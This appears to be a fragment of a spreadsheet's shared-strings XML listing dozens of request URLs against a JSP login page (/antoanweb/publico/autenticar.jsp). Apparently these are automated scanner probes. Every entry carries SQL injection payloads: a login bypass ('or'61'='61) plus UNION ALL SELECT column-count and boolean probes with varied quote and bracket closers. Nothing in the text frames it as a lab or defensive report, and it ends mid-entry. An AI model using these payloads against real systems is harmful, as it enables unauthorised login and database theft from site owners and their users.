    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('oxum'like'oxum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--and(('mfed'like'mfed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--and(('scqw'like'scqw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--and(('nrlv'like'nrlv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--and(('nzif'like'nzif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--and(('dnsh'like'dnsh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--and(('nmaq'like'nmaq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--and(('cais'like'cais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--and(('ffpk'like'ffpk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,null--and(('iras'like'iras&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('pihm'like'pihm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--and((('vaph'like'vaph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--and((('fbtl'like'fbtl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--and((('rcpb'like'rcpb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--and((('qiaq'like'qiaq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--and((('drlx'like'drlx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--and((('bgwb'like'bgwb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--and((('hbxr'like'hbxr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--and((('vmst'like'vmst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,null--and((('fucj'like'fucj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('jwdp'like'jwdp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--and'nwgj'like'nwgj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--and'goii'like'goii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--and'mrbu'like'mrbu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--and'svcf'like'svcf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--and'tfwb'like'tfwb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--and'lrmm'like'lrmm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--and'mcbj'like'mcbj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--and'doik'like'doik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--and'lmxp'like'lmxp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'clss'like'cls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--and("bioi"="bioi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--and("xwya"="xwya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--and("prbm"="prbm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--and("ggeo"="ggeo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--and("zmqe"="zmqe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--and("qxns"="qxn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--and("nene"="nene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--and("vglr"="vglr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,null--and("snwk"="snwk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,null,null--and("ymqf"="ymqf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--and(("lgad"="lgad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--and(("yvng"="yvng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--and(("wjtp"="wjtp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--and(("nidg"="nidg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--and(("ftrj"="ftrj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--and(("bxwl"="bxwl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--and(("vyqs"="vyqs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--and(("qgyq"="qgyq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,null--and(("mqui"="mqui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,null,null--and(("qfxx"="qfxx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--and((("qoba"="qoba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--and((("qxhg"="qxhg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--and((("yttk"="yttk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--and((("fdop"="fdop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--and((("rfku"="rfku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--and((("ttxq"="ttxq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--and((("hcwx"="hcwx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--and((("zhlm"="zhlm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,null--and((("iorl"="iorl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,null,null--and((("ammp"="ammp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--and"rmbo"="rmbo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--and"mbyx"="mbyx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--and"hgej"="hgej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--and"vtmt"="vtmt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--and"veig"="veig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--and"agzp"="agzp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--and"vrtd"="vrtd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--and"ygkl"="ygkl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--and"kkif"="kkif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,null--and"ntkw"="ntkw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--and("zaus"like"zau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--and("nbbs"like"nbb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--and("rlgg"like"rlgg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--and("bjtr"like"bjtr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--and("knku"like"knku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--and("zdjs"like"zdjs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--and("hxeq"like"hxeq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--and("kqdc"like"kqdc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,null--and("ykrh"like"ykrh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("agwv"like"agwv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--and(("ccly"like"ccly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--and(("nkcu"like"nkcu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--and(("eqwg"like"eqwg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--and(("pdwy"like"pdwy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--and(("scky"like"scky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--and(("zced"like"zced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--and(("ytic"like"ytic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--and(("bcql"like"bcql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,null--and(("drwe"like"drwe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("stgp"like"stgp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--and((("lita"like"lita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--and((("ejcr"like"ejcr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--and((("kuez"like"kuez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--and((("jhsc"like"jhsc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--and((("xwfp"like"xwfp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--and((("lhcd"like"lhcd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--and((("hhoe"like"hhoe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--and((("pjdu"like"pjdu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,null--and((("dyyq"like"dyyq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("qjmp"like"qjmp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--and"rtsl"like"rtsl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--and"oynz"like"oynz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--and"lfis"like"lfis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--and"xtfi"like"xtfi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--and"faby"like"faby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--and"jnav"like"jnav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--and"itta"like"itta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--and"pkjf"like"pkjf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--and"ctfl"like"ctfl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"ygky"like"ygky&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880,9880--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650,6650--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588,1588--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923,4923--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672,7672--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217,8217--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102,8102--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706,2706--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821,9821--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217,1217--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840,840--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007,1007--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912,8912--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117,5117--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167,6167--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768,3768--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325,325--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265,4265--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041,8041--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043,9043--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263,3263--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654,4654--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224,7224--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022,7022--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829,9829--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086,9086--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686,3686--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755,5755--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780,1780--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498,4498--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477,4477--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423,5423--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293,9293--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794,5794--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680,1680--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641,1641--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136,7136--and(3430=3430&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289,289--and(5295=5295&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292,8292--and(2174=2174&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459,1459--and(3031=3031&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038,7038--and(7392=7392&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296,8296--and(6034=6034&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069--and(9167=9167&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240,3240--and(4840=4840&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044,7044--and(5677=5677&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445,4445--and(5646=5646&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786,2786--and((898=898&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459,2459--and((650=650&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586--and((2087=2087&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059,4059--and((6819=6819&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337--and((859=859&amp;modo=entrar</t>
  </si>
  <si>
